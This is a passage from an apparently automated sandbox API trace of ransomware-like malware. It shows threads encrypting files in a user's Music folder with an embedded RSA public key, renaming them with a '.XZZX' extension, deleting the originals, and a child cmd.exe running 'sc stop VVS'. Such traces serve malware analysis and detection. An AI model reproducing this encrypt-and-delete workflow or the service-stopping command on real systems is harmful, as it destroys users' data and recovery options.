9VtNbJuKze\\X7t8w3.m4a") returned 69 [0053.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0053.208] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\23947E243409DC7CAF2C62063821C0C4.XZZX") returned 96 [0053.208] StrStrW (lpFirst="X7t8w3.m4a", lpSrch="XZZX") returned 0x0 [0053.208] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\X7t8w3.m4a", dwFileAttributes=0x20) returned 1 [0053.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\X7t8w3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\x7t8w3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0053.209] ReadFile (in: hFile=0x618, lpBuffer=0x4306348, nNumberOfBytesToRead=0x9442, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x4306348*, lpNumberOfBytesRead=0x417e418*=0x9442, lpOverlapped=0x0) returned 1 [0053.209] CloseHandle (hObject=0x618) returned 1 [0053.209] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0053.210] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0053.210] SetErrorMode (uMode=0x1) returned 0x1 [0053.210] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0053.210] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a680) returned 1 [0053.213] CryptGenKey (in: hProv=0x439a680, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e28778) returned 1 [0053.524] CryptExportKey (in: hKey=0x3e28778, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0053.524] CryptExportKey (in: hKey=0x3e28778, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x417e41c | out: pbData=0x3f00000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0053.524] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0053.525] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0053.525] CryptDestroyKey (hKey=0x3e28778) returned 1 [0053.525] CryptReleaseContext (hProv=0x439a818, dwFlags=0x0) returned 0 [0053.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\23947E243409DC7CAF2C62063821C0C4.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\23947e243409dc7caf2c62063821c0c4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x634 [0053.525] WriteFile (in: hFile=0x634, lpBuffer=0x4306348*, nNumberOfBytesToWrite=0x9442, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x4306348*, lpNumberOfBytesWritten=0x417e438*=0x9442, lpOverlapped=0x0) returned 1 [0053.527] SetFilePointer (in: hFile=0x634, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9442 [0053.527] WriteFile (in: hFile=0x634, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0053.527] SetFilePointer (in: hFile=0x634, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9447 [0053.527] WriteFile (in: hFile=0x634, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x14, lpOverlapped=0x0) returned 1 [0053.527] SetFilePointer (in: hFile=0x634, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x945b [0053.527] WriteFile (in: hFile=0x634, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0053.527] SetFilePointer (in: hFile=0x634, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9460 [0053.527] SetErrorMode (uMode=0x1) returned 0x1 [0053.527] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0053.527] OutputDebugStringW (lpOutputString="end") [0053.528] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wð@0\x04`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0053.528] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0053.528] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x439a8a0) returned 1 [0053.528] CryptImportPublicKeyInfo (in: hCryptProv=0x439a8a0, dwCertEncodingType=0x1, pInfo=0x42e1b20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1b50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1b58*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e28778) returned 1 [0053.528] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0053.529] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0053.529] CryptEncrypt (in: hKey=0x3e28778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0053.529] CryptEncrypt (in: hKey=0x3e28778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a928*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a928*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0053.529] WriteFile (in: hFile=0x634, lpBuffer=0x439a928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x439a928*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0053.529] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0053.529] WriteFile (in: hFile=0x634, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0053.530] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0053.530] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0053.530] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x638) returned 0x0 [0053.530] RegQueryValueExW (in: hKey=0x638, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x66, lpcbData=0x417dfdc*=0x4) returned 0x0 [0053.530] RegCloseKey (hKey=0x638) returned 0x0 [0053.530] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x638) returned 0x0 [0053.530] RegSetValueExW (in: hKey=0x638, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x67, cbData=0x4 | out: lpData=0x417dfec*=0x67) returned 0x0 [0053.530] RegCloseKey (hKey=0x638) returned 0x0 [0053.530] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0053.531] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0053.531] CloseHandle (hObject=0x634) returned 1 [0053.532] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0053.533] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0053.533] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\X7t8w3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\x7t8w3.m4a")) returned 1 [0053.534] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\X7t8w3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\x7t8w3.m4a")) returned 0 Thread: id = 198 os_tid = 0x9bc [0053.348] lstrcpyA (in: lpString1=0x46cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0053.348] lstrcpyW (in: lpString1=0x46cf460, lpString2="2zrMBovJou.wav" | out: lpString1="2zrMBovJou.wav") returned="2zrMBovJou.wav" [0053.348] lstrcpyW (in: lpString1=0x46ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0053.349] SetErrorMode (uMode=0x1) returned 0x1 [0053.349] lstrcpyW (in: lpString1=0x46cf860, lpString2="2zrMBovJou.wav" | out: lpString1="2zrMBovJou.wav") returned="2zrMBovJou.wav" [0053.349] CoCreateGuid (in: pguid=0x46ce440 | out: pguid=0x46ce440*(Data1=0x92eb7978, Data2=0x5f12, Data3=0x4114, Data4=([0]=0x84, [1]=0x56, [2]=0x79, [3]=0x64, [4]=0xff, [5]=0xc7, [6]=0xc2, [7]=0xe8))) returned 0x0 [0053.349] wsprintfW (in: param_1=0x46cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav") returned 87 [0053.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x46cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0053.349] wsprintfW (in: param_1=0x46ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B6A21270182AFF6892EB79781C97E3B0.XZZX") returned 110 [0053.349] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="XZZX") returned 0x0 [0053.349] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav", dwFileAttributes=0x20) returned 1 [0053.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\2zrmbovjou.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0053.350] ReadFile (in: hFile=0x5f0, lpBuffer=0x430f798, nNumberOfBytesToRead=0x163bf, lpNumberOfBytesRead=0x46ce418, lpOverlapped=0x0 | out: lpBuffer=0x430f798*, lpNumberOfBytesRead=0x46ce418*=0x163bf, lpOverlapped=0x0) returned 1 [0053.350] CloseHandle (hObject=0x5f0) returned 1 [0053.351] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0053.351] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0053.352] SetErrorMode (uMode=0x1) returned 0x1 [0053.352] lstrcpyW (in: lpString1=0x46ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0053.352] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a818) returned 1 [0053.355] CryptGenKey (hProv=0x439a818, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28) Thread: id = 199 os_tid = 0xa58 [0053.534] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0053.534] lstrcpyW (in: lpString1=0x42cf460, lpString2="btD83YaGWQR.m4a" | out: lpString1="btD83YaGWQR.m4a") returned="btD83YaGWQR.m4a" [0053.534] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0053.535] SetErrorMode (uMode=0x1) returned 0x1 [0053.535] lstrcpyW (in: lpString1=0x42cf860, lpString2="btD83YaGWQR.m4a" | out: lpString1="btD83YaGWQR.m4a") returned="btD83YaGWQR.m4a" [0053.535] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x72f5c9ac, Data2=0xf1a, Data3=0x49cb, Data4=([0]=0xad, [1]=0xbc, [2]=0x51, [3]=0xa0, [4]=0x8e, [5]=0x99, [6]=0x47, [7]=0xdf))) returned 0x0 [0053.535] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a") returned 88 [0053.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0053.535] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\13C78F78045A639E72F5C9AC088747E6.XZZX") returned 110 [0053.535] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="XZZX") returned 0x0 [0053.535] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a", dwFileAttributes=0x20) returned 1 [0053.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btd83yagwqr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0053.536] ReadFile (in: hFile=0x61c, lpBuffer=0x42e9eb8, nNumberOfBytesToRead=0x797d, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42e9eb8*, lpNumberOfBytesRead=0x42ce418*=0x797d, lpOverlapped=0x0) returned 1 [0053.536] CloseHandle (hObject=0x61c) returned 1 [0053.536] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e70000 [0053.537] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e80000 [0053.537] SetErrorMode (uMode=0x1) returned 0x1 [0053.538] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0053.538] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x439a9b0) returned 1 [0053.540] CryptGenKey (hProv=0x439a9b0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28) Thread: id = 200 os_tid = 0xacc Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x655a1000" os_pid = "0xa1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C sc stop VVS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 376 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 378 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 379 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 380 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 381 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 382 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a510000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 383 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 384 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 385 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 386 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 387 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 388 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 389 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 390 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 391 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 392 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 393 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 394 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 395 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 522 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 523 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 524 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 525 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 526 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 527 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 528 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 529 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename 